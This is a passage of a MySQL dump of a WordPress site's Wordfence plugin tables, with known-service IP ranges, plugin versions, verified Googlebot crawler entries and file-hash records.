\"31.13.66.0\\/24\",\"173.252.96.0\\/19\",\"69.63.178.0\\/24\",\"31.13.78.0\\/24\",\"31.13.79.0\\/24\",\"31.13.80.0\\/24\",\"31.13.82.0\\/24\",\"31.13.83.0\\/24\",\"31.13.84.0\\/24\",\"31.13.85.0\\/24\",\"31.13.86.0\\/24\",\"31.13.87.0\\/24\",\"31.13.88.0\\/24\",\"31.13.89.0\\/24\",\"31.13.90.0\\/24\",\"31.13.91.0\\/24\",\"31.13.92.0\\/24\",\"31.13.93.0\\/24\",\"31.13.94.0\\/24\",\"31.13.95.0\\/24\",\"69.171.253.0\\/24\",\"69.63.186.0\\/24\",\"31.13.81.0\\/24\",\"179.60.192.0\\/22\",\"179.60.192.0\\/24\",\"179.60.193.0\\/24\",\"179.60.194.0\\/24\",\"179.60.195.0\\/24\",\"185.60.216.0\\/22\",\"45.64.40.0\\/22\",\"185.60.216.0\\/24\",\"185.60.217.0\\/24\",\"185.60.218.0\\/24\",\"185.60.219.0\\/24\",\"129.134.0.0\\/16\",\"157.240.0.0\\/16\",\"157.240.8.0\\/24\",\"157.240.0.0\\/24\",\"157.240.1.0\\/24\",\"157.240.2.0\\/24\",\"157.240.3.0\\/24\",\"157.240.4.0\\/24\",\"157.240.5.0\\/24\",\"157.240.6.0\\/24\",\"157.240.7.0\\/24\",\"157.240.9.0\\/24\",\"157.240.10.0\\/24\",\"157.240.16.0\\/24\",\"157.240.19.0\\/24\",\"157.240.11.0\\/24\",\"157.240.12.0\\/24\",\"157.240.13.0\\/24\",\"157.240.14.0\\/24\",\"157.240.15.0\\/24\",\"157.240.17.0\\/24\",\"157.240.18.0\\/24\",\"157.240.20.0\\/24\",\"157.240.21.0\\/24\",\"157.240.22.0\\/24\",\"157.240.23.0\\/24\",\"157.240.0.0\\/17\",\"69.171.250.0\\/24\",\"157.240.24.0\\/24\",\"157.240.25.0\\/24\",\"199.201.64.0\\/24\",\"199.201.65.0\\/24\",\"199.201.64.0\\/22\",\"204.15.20.0\\/22\",\"157.240.192.0\\/24\",\"129.134.0.0\\/17\",\"204.15.20.0\\/22\",\"69.63.176.0\\/20\",\"69.63.176.0\\/21\",\"69.63.184.0\\/21\",\"66.220.144.0\\/20\",\"69.63.176.0\\/20\",\"2620:0:1c00::\\/40\",\"2a03:2880::\\/32\",\"2a03:2880:fffe::\\/48\",\"2a03:2880:ffff::\\/48\",\"2620:0:1cff::\\/48\",\"2a03:2880:f000::\\/48\",\"2a03:2880:f001::\\/48\",\"2a03:2880:f002::\\/48\",\"2a03:2880:f003::\\/48\",\"2a03:2880:f004::\\/48\",\"2a03:2880:f005::\\/48\",\"2a03:2880:f006::\\/48\",\"2a03:2880:f007::\\/48\",\"2a03:2880:f008::\\/48\",\"2a03:2880:f009::\\/48\",\"2a03:2880:f00a::\\/48\",\"2a03:2880:f00b::\\/48\",\"2a03:2880:f00c::\\/48\",\"2a03:2880:f00d::\\/48\",\"2a03:2880:f00e::\\/48\",\"2a03:2880:f00f::\\/48\",\"2a03:2880:f010::\\/48\",\"2a03:2880:f011::\\/48\",\"2a03:2880:f012::\\/48\",\"2a03:2880:f013::\\/48\",\"2a03:2880:f014::\\/48\",\"2a03:2880:f015::\\/48\",\"2a03:2880:f016::\\/48\",\"2a03:2880:f017::\\/48\",\"2a03:2880:f018::\\/48\",\"2a03:2880:f019::\\/48\",\"2a03:2880:f01a::\\/48\",\"2a03:2880:f01b::\\/48\",\"2a03:2880:f01c::\\/48\",\"2a03:2880:f01d::\\/48\",\"2a03:2880:f01e::\\/48\",\"2a03:2880:f01f::\\/48\",\"2a03:2880:1000::\\/36\",\"2a03:2880:2000::\\/36\",\"2a03:2880:3000::\\/36\",\"2a03:2880:4000::\\/36\",\"2a03:2880:5000::\\/36\",\"2a03:2880:6000::\\/36\",\"2a03:2880:7000::\\/36\",\"2a03:2880:f020::\\/48\",\"2a03:2880:f021::\\/48\",\"2a03:2880:f022::\\/48\",\"2a03:2880:f023::\\/48\",\"2a03:2880:f024::\\/48\",\"2a03:2880:f025::\\/48\",\"2a03:2880:f026::\\/48\",\"2a03:2880:f027::\\/48\",\"2a03:2880:f028::\\/48\",\"2a03:2880:f029::\\/48\",\"2a03:2880:f02b::\\/48\",\"2a03:2880:f02c::\\/48\",\"2a03:2880:f02d::\\/48\",\"2a03:2880:f02e::\\/48\",\"2a03:2880:f02f::\\/48\",\"2a03:2880:f030::\\/48\",\"2a03:2880:f031::\\/48\",\"2a03:2880:f032::\\/48\",\"2a03:2880:f033::\\/48\",\"2a03:2880:f034::\\/48\",\"2a03:2880:f035::\\/48\",\"2a03:2880:f036::\\/48\",\"2a03:2880:f037::\\/48\",\"2a03:2880:f038::\\/48\",\"2a03:2880:f039::\\/48\",\"2a03:2880:f03a::\\/48\",\"2a03:2880:f03b::\\/48\",\"2a03:2880:f03c::\\/48\",\"2a03:2880:f03d::\\/48\",\"2a03:2880:f03e::\\/48\",\"2a03:2880:f03f::\\/48\",\"2401:db00::\\/32\",\"2a03:2880::\\/36\",\"2803:6080::\\/32\",\"2a03:2880:f100::\\/48\",\"2a03:2880:f200::\\/48\",\"2a03:2880:f101::\\/48\",\"2a03:2880:f201::\\/48\",\"2a03:2880:f102::\\/48\",\"2a03:2880:f202::\\/48\",\"2a03:2880:f103::\\/48\",\"2a03:2880:f203::\\/48\",\"2a03:2880:f104::\\/48\",\"2a03:2880:f204::\\/48\",\"2a03:2880:f107::\\/48\",\"2a03:2880:f207::\\/48\",\"2a03:2880:f108::\\/48\",\"2a03:2880:f208::\\/48\",\"2a03:2880:f109::\\/48\",\"2a03:2880:f209::\\/48\",\"2a03:2880:f10a::\\/48\",\"2a03:2880:f20a::\\/48\",\"2a03:2880:f10b::\\/48\",\"2a03:2880:f20b::\\/48\",\"2a03:2880:f10d::\\/48\",\"2a03:2880:f20d::\\/48\",\"2a03:2880:f10e::\\/48\",\"2a03:2880:f20e::\\/48\",\"2a03:2880:f10f::\\/48\",\"2a03:2880:f20f::\\/48\",\"2a03:2880:f110::\\/48\",\"2a03:2880:f210::\\/48\",\"2a03:2880:f111::\\/48\",\"2a03:2880:f211::\\/48\",\"2a03:2880:f112::\\/48\",\"2a03:2880:f212::\\/48\",\"2a03:2880:f114::\\/48\",\"2a03:2880:f214::\\/48\",\"2a03:2880:f115::\\/48\",\"2a03:2880:f215::\\/48\",\"2a03:2880:f116::\\/48\",\"2a03:2880:f216::\\/48\",\"2a03:2880:f117::\\/48\",\"2a03:2880:f217::\\/48\",\"2a03:2880:f118::\\/48\",\"2a03:2880:f218::\\/48\",\"2a03:2880:f119::\\/48\",\"2a03:2880:f219::\\/48\",\"2a03:2880:f11a::\\/48\",\"2a03:2880:f21a::\\/48\",\"2a03:2880:f11f::\\/48\",\"2a03:2880:f21f::\\/48\",\"2a03:2880:f121::\\/48\",\"2a03:2880:f221::\\/48\",\"2a03:2880:f122::\\/48\",\"2a03:2880:f222::\\/48\",\"2a03:2880:f123::\\/48\",\"2a03:2880:f223::\\/48\",\"2a03:2880:f10c::\\/48\",\"2a03:2880:f20c::\\/48\",\"2a03:2880:f126::\\/48\",\"2a03:2880:f226::\\/48\",\"2a03:2880:f105::\\/48\",\"2a03:2880:f205::\\/48\",\"2a03:2880:f125::\\/48\",\"2a03:2880:f225::\\/48\",\"2a03:2880:f106::\\/48\",\"2a03:2880:f206::\\/48\",\"2a03:2880:f11b::\\/48\",\"2a03:2880:f21b::\\/48\",\"2a03:2880:f113::\\/48\",\"2a03:2880:f213::\\/48\",\"2a03:2880:f11c::\\/48\",\"2a03:2880:f21c::\\/48\",\"2a03:2880:f128::\\/48\",\"2a03:2880:f228::\\/48\",\"2a03:2880:f02a::\\/48\",\"2a03:2880:f12a::\\/48\",\"2a03:2880:f22a::\\/48\",\"2a03:2880:f12f::\\/48\",\"2a03:2880:f22f::\\/48\",\"2a03:2880:f11d::\\/48\",\"2a03:2880:f11e::\\/48\",\"2a03:2880:f120::\\/48\",\"2a03:2880:f124::\\/48\",\"2a03:2880:f127::\\/48\",\"2a03:2880:f129::\\/48\",\"2a03:2880:f12b::\\/48\",\"2a03:2880:f12c::\\/48\",\"2a03:2880:f12d::\\/48\",\"2a03:2880:f12e::\\/48\",\"2a03:2880:f130::\\/48\",\"2a03:2880:f131::\\/48\",\"2a03:2880:f132::\\/48\",\"2a03:2880:f133::\\/48\",\"2a03:2880:f134::\\/48\",\"2a03:2880:f135::\\/48\",\"2a03:2880:f136::\\/48\",\"2a03:2880:f137::\\/48\",\"2a03:2880:f138::\\/48\",\"2a03:2880:f139::\\/48\",\"2a03:2880:f13a::\\/48\",\"2a03:2880:f13b::\\/48\",\"2a03:2880:f13c::\\/48\",\"2a03:2880:f13d::\\/48\",\"2a03:2880:f13e::\\/48\",\"2a03:2880:f13f::\\/48\",\"2a03:2880:f21d::\\/48\",\"2a03:2880:f21e::\\/48\",\"2a03:2880:f220::\\/48\",\"2a03:2880:f224::\\/48\",\"2a03:2880:f227::\\/48\",\"2a03:2880:f229::\\/48\",\"2a03:2880:f22b::\\/48\",\"2a03:2880:f22c::\\/48\",\"2a03:2880:f22d::\\/48\",\"2a03:2880:f22e::\\/48\",\"2a03:2880:f230::\\/48\",\"2a03:2880:f231::\\/48\",\"2a03:2880:f232::\\/48\",\"2a03:2880:f233::\\/48\",\"2a03:2880:f234::\\/48\",\"2a03:2880:f235::\\/48\",\"2a03:2880:f236::\\/48\",\"2a03:2880:f237::\\/48\",\"2a03:2880:f238::\\/48\",\"2a03:2880:f239::\\/48\",\"2a03:2880:f23a::\\/48\",\"2a03:2880:f23b::\\/48\",\"2a03:2880:f23c::\\/48\",\"2a03:2880:f23d::\\/48\",\"2a03:2880:f23e::\\/48\",\"2a03:2880:f23f::\\/48\",\"2a03:2880:f0ff::\\/48\",\"2a03:2880:f1ff::\\/48\",\"2a03:2880:f2ff::\\/48\",\"2c0f:ef78:0003::\\/48\"]},\"uptimerobot\":{\"n\":\"Uptime Robot\",\"d\":true,\"r\":[\"69.162.124.224\\/28\",\"63.143.42.240\\/28\"]},\"statuscake\":{\"n\":\"StatusCake\",\"d\":true,\"r\":[\"103.194.112.70\",\"104.131.247.151\",\"104.131.248.65\",\"104.131.248.78\",\"104.156.229.24\",\"104.156.255.184\",\"104.206.168.26\",\"104.238.164.105\",\"107.150.1.135\",\"107.155.104.182\",\"107.155.108.234\",\"107.155.125.29\",\"107.161.28.219\",\"107.170.197.248\",\"107.170.219.46\",\"107.170.227.23\",\"107.170.227.24\",\"107.170.240.141\",\"107.170.53.191\",\"107.191.47.131\",\"107.191.57.237\",\"108.61.119.153\",\"108.61.162.214\",\"108.61.205.201\",\"108.61.212.141\",\"108.61.215.179\",\"125.63.48.239\",\"128.199.222.65\",\"138.197.130.232\",\"138.197.130.235\",\"138.197.140.243\",\"138.204.171.136\",\"138.68.24.115\",\"138.68.24.136\",\"138.68.24.207\",\"138.68.24.60\",\"138.68.80.10\",\"138.68.80.173\",\"139.59.15.79\",\"139.59.155.26\",\"139.59.190.241\",\"139.59.22.109\",\"139.59.26.85\",\"139.59.29.167\",\"149.154.157.61\",\"149.255.59.100\",\"151.236.10.238\",\"151.236.18.80\",\"151.80.175.223\",\"151.80.175.226\",\"154.127.60.23\",\"154.127.60.59\",\"158.255.208.76\",\"159.203.182.22\",\"159.203.182.60\",\"159.203.186.225\",\"159.203.31.18\",\"162.243.247.163\",\"162.243.71.56\",\"162.248.97.72\",\"162.253.64.104\",\"162.253.64.87\",\"176.56.230.110\",\"178.62.101.57\",\"178.62.104.137\",\"178.62.106.84\",\"178.62.109.7\",\"178.62.40.233\",\"178.62.41.44\",\"178.62.41.49\",\"178.62.41.52\",\"178.62.65.162\",\"178.62.71.227\",\"178.62.78.199\",\"178.62.80.93\",\"178.62.86.69\",\"178.73.210.99\",\"181.41.201.117\",\"181.41.214.137\",\"185.112.157.185\",\"185.12.45.70\",\"185.47.129.168\",\"185.60.135.86\",\"188.166.158.224\",\"188.166.253.148\",\"188.226.139.158\",\"188.226.158.160\",\"188.226.169.228\",\"188.226.171.58\",\"188.226.184.152\",\"188.226.185.106\",\"188.226.186.199\",\"188.226.203.84\",\"188.226.247.184\",\"188.68.238.79\",\"192.241.221.11\",\"193.124.178.54\",\"193.124.178.61\",\"193.182.144.105\",\"193.182.144.147\",\"199.167.128.80\",\"209.222.30.242\",\"213.183.56.107\",\"217.148.43.188\",\"217.148.43.202\",\"31.220.7.237\",\"37.157.246.146\",\"37.235.48.42\",\"37.235.52.25\",\"37.235.53.240\",\"37.235.55.205\",\"37.97.188.103\",\"45.32.128.80\",\"45.32.145.79\",\"45.32.151.21\",\"45.32.160.172\",\"45.32.166.195\",\"45.32.171.24\",\"45.32.192.198\",\"45.32.195.186\",\"45.32.195.93\",\"45.32.212.56\",\"45.32.36.158\",\"45.32.7.22\",\"45.63.121.159\",\"45.63.26.78\",\"45.63.51.63\",\"45.63.61.213\",\"45.63.76.68\",\"45.63.78.84\",\"45.63.86.120\",\"45.63.88.213\",\"45.76.1.44\",\"45.76.192.50\",\"45.76.3.112\",\"46.101.0.24\",\"46.101.110.32\",\"46.101.110.43\",\"46.101.110.45\",\"46.101.20.96\",\"46.101.238.182\",\"46.101.238.189\",\"46.101.240.208\",\"46.101.27.186\",\"46.101.61.83\",\"46.101.74.251\",\"5.45.179.103\",\"50.2.139.16\",\"82.221.95.161\",\"91.236.116.163\"]},\"managewp\":{\"n\":\"ManageWP\",\"d\":false,\"r\":[\"34.211.180.66\",\"54.70.65.107\",\"34.210.224.7\",\"52.41.5.108\",\"52.35.72.129\",\"54.191.137.17\",\"35.162.254.253\",\"52.11.12.231\",\"52.11.29.70\",\"52.11.54.161\",\"52.24.142.159\",\"52.25.191.255\",\"52.27.181.126\",\"52.34.126.117\",\"52.34.254.47\",\"52.35.82.99\",\"52.36.28.80\",\"52.38.106.97\",\"52.39.177.152\",\"52.41.230.148\",\"52.41.237.12\",\"52.42.126.166\",\"52.43.13.71\",\"52.43.76.224\",\"52.88.96.110\",\"52.89.155.51\",\"54.148.73.118\",\"54.186.37.105\",\"54.187.92.57\",\"54.191.32.65\",\"54.191.67.23\",\"54.191.80.119\",\"54.191.135.209\",\"54.191.136.176\",\"54.191.148.85\",\"54.191.149.8\",\"52.26.122.21\",\"52.24.187.29\",\"52.89.85.107\",\"54.186.128.167\",\"54.191.40.136\",\"52.24.62.11\",\"52.88.119.122\",\"54.191.148.225\",\"54.191.151.18\",\"52.89.94.121\",\"52.25.116.116\",\"52.88.215.225\",\"54.186.143.184\",\"52.88.197.180\",\"52.27.171.126\"]},\"seznam\":{\"n\":\"Seznam Search Engine\",\"d\":true,\"r\":[\"77.75.74.0\\/24\",\"77.75.76.0\\/24\",\"77.75.77.0\\/24\",\"77.75.78.0\\/24\",\"77.75.79.0\\/24\",\"2a02:598:a::78:0\\/112\",\"2a02:598:a::79:0\\/112\",\"2a02:598:2::0\\/96\"]}}','yes'),('wordfenceI18n','1','yes'),('wordpressPluginVersions','a:5:{s:35:\"all-in-one-wp-security-and-firewall\";s:5:\"4.4.9\";s:5:\"hello\";s:5:\"1.7.2\";s:11:\"redirection\";s:5:\"5.1.3\";s:9:\"wordfence\";s:5:\"7.5.5\";s:9:\"wp-cerber\";s:5:\"8.9.3\";}','yes'),('wordpressThemeVersions','a:1:{s:9:\"newsmagbd\";s:3:\"2.0\";}','yes'),('wordpressVersion','5.8','yes'),('wp_home_url','https://www.westonspirit.org.uk','yes'),('wp_site_url','https://www.westonspirit.org.uk','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfcrawlers`
--

DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfcrawlers`
--

LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�@b','�����>�b0�oQ1��','verified',1629289230,'crawl-66-249-64-98.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@x','�����>�b0�oQ1��','verified',1629338941,'crawl-66-249-64-120.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@|','�����>�b0�oQ1��','verified',1629305458,'crawl-66-249-64-124.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@~','�����>�b0�oQ1��','verified',1629293821,'crawl-66-249-64-126.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B0','�����>�b0�oQ1��','verified',1629280012,'crawl-66-249-66-48.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B6','�����>�b0�oQ1��','verified',1629216573,'crawl-66-249-66-54.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B8','�����>�b0�oQ1��','verified',1629207940,'crawl-66-249-66-56.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B:','�����>�b0�oQ1��','verified',1629220159,'crawl-66-249-66-58.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Ev','�����>�b0�oQ1��','verified',1629460240,'crawl-66-249-69-118.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Ex','�����>�b0�oQ1��','verified',1629475019,'crawl-66-249-69-120.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Ez','�����>�b0�oQ1��','verified',1629271883,'crawl-66-249-69-122.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�F','�����>�b0�oQ1��','verified',1629367651,'crawl-66-249-70-12.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�F','�����>�b0�oQ1��','verified',1629367644,'crawl-66-249-70-14.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�F','�����>�b0�oQ1��','verified',1629325757,'crawl-66-249-70-16.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1629502009,'crawl-66-249-72-176.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1629502008,'crawl-66-249-72-178.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�H�','�����>�b0�oQ1��','verified',1629531758,'crawl-66-249-72-180.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�O\Z','�����>�b0�oQ1��','verified',1629636903,'crawl-66-249-79-26.googlebot.com');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilechanges`
--

DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilechanges`
--

LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilemods`
--

DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilemods`
--

LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\05g���꫔c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pԔ��2��W�U','�h�h�h|O���D\r[�6�����:<t\r��','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�)��&�c���','1�t/g�7O�$�U~�4n7�Z\Z�;u��)�dk��n','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('\0\\s�TÐ��֘8��','wp-includes/blocks/post-excerpt/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vӶ=dR\"<�k���U�','���%�#\0e��V�m�-�/�X�@�SW�z�?�','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3�	vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����׶H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('\0�G���As�7.��.�V','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��޻�T�����}2�','�̖�^)�VX����|���p�OS]��~h�','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z�bb})*9�>','�G�d�2���P#	�Hؖx���i�tψ�','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0�v����ئ���ݞ','wp-includes/blocks/post-template/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y\\G�-rP�+�\Z�B��','�75~��lIZ[\\�G1��\n�|u?fU�EK!','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y���8[֫��\'����','<ۚ�B^��c��xU�NL�xc�#\\�c��','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,��	Ev�','',0,'?'),('/>����(��3�','wp-includes/blocks/verse/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y����Vq�Y�\n�','MbO<W\'8!����A��S�\r�G_n0���s�','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\h����\'\n䷺',' �7��RG�$/����-i��Nm(�W�;̅','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('}K&�(t�-0W�Of�e','wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�m!U߄���U','wp-content/plugins/wp-cerber/assets/flags/bz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�����ڜ�','�0^k R�e�����q��C���G���Q\"��','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\Z5O�a46���>f�Z','�Z2��6Q�����뎬6��0�w5��J�{�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[O��|�e��J�,^�','���KaJv	h�t&��^#ğeT�<�9�@L?','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�-��z��g��!k��','/�x-�i�.J��m�c9f%�\\	w�9H{','',0,'?'),('�&�L�sͱ<�M','wp-content/themes/newsmagbd/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�c�`�3֐a�%߉','Y�a���C�^f�\'�\\�l�nj\\}S�,oIZf�','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('\'�5�ur߲���m','wp-content/plugins/wp-cerber/cerber-whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���D�pM����Q�','t<e��F/�+�A�8�_�D\Z�����[��jg','',0,'?'),('*&5,qV׷0v�c','wp-includes/blocks/post-template/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:l$���^4�x`��','��%��WӸsK����{�:��T5�%6�]�D�u','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�','	